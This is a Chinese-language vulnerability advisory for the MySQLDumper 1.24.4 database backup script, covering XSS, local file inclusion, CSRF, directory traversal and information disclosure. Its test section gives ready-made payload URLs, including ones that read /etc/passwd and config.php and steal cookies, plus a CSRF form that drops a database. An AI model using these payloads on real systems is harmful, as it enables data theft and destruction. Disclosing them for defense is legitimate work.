MySQLDumper多个安全漏洞
MySQLDumper多个安全漏洞
发布日期:2012-04-27
更新日期:2012-08-17
受影响系统:
MySQLDumper MySQLDumper 1.24.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53306
MySQLDumper是用PHP和Perl编写的MySQL数据库备份脚本。
MySQLDumper 1.24.4及其他版本在实现上存在多个安全漏洞,包括XSS、本地文件包含、跨站请求伪造、信息泄露、目录遍历漏洞,可允许攻击者获取敏感信息,执行任意脚本代码,窃取Cookie身份验证凭证,执行非法操作,查看和执行本地文件,检索任意文件。
<*来源:Akastep
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Akastep ()提供了如下测试方法:
Local File-inclusion:
http://www.example.com/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00
Cross-site scripting:
http://www.example.com/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1
http://www.example.com/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;
Cross-site request-forgery:
<img src="http://www.example.com/tld/meonyourpc.PNG" heigth="250" width="300" />
<form name="hackit" id="hackit" action="http://www.example.com/learn/cubemail/main.php?action=db&dbid=1" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
</form>
http://www.example.com/learn/cubemail/install.php?language=en&phase=101
http://www.example.com/learn/cubemail/install.php?language=en&phase=2
<img src="http://www.example.com/learn/cubemail/sql.php?sql_statement=select+benchmark%28100000000,md5%28now%28%29%29%29--" heigth="0" width="0" />
Directory-traversal:
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
Information disclosure
http://www.example.com/learn/cubemail/restore.php
http://www.example.com/learn/cubemail/dump.php
http://www.example.com/learn/cubemail/refresh_dblist.php
建议:
--------------------------------------------------------------------------------
厂商补丁:
MySQLDumper
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mysqldumper.de/
评论暂时关闭